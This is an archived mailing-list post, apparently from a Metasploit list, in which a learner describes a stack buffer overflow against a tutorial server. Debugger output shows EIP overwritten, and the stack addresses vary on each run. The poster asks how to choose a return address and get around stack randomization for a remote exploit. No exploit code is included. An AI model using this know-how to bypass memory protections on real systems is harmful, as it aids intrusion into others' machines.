stack randomization

[0x0804 at gmail.com (curious one)]

Is there memory protection mechanism of some kind in Slackware? I did the
following to check if I can land into same nop zone, if not the exact
address but still somewhere inteh nop zone. I was following the server code
as listed in this tutorial :
http://www.exploitx.com/forum/azbb.php?1112286936 . Now when I am running
this code in gdb, and over flow it with an input of 1034 A's, I can over
write EIP completely:

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()


So I did a (gdb) x/200bx $esp-200 and selected an address whih was somewhere
in the middle of the A's zone :0xbfe4b338. For ease I choose 11th line from
the command to see if next time when I get the address in the same range.

I killed the server and repeated the same process over and over again.
Everytime the choosen position reflected different register and not just
different, it was a difference of quite a bit. Follwoing are the addresses
reflected in the choosen position in various iterations:

1st iteration
0xbfe4b338

2nd iteration
0xbfd1bcb8

3rd iteration
0xbf898228

4th iteration
0xbffe7208

If total length of my shellcode is to be 2000 (7D0h), how would I go about
choosing the return address?

As teh scenerio I am trying to stimulate is of a remote exploit, how would I
get around to this randomization? Any good reads about this?

Cheers
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20060410/1fee2c33/attachment.htm>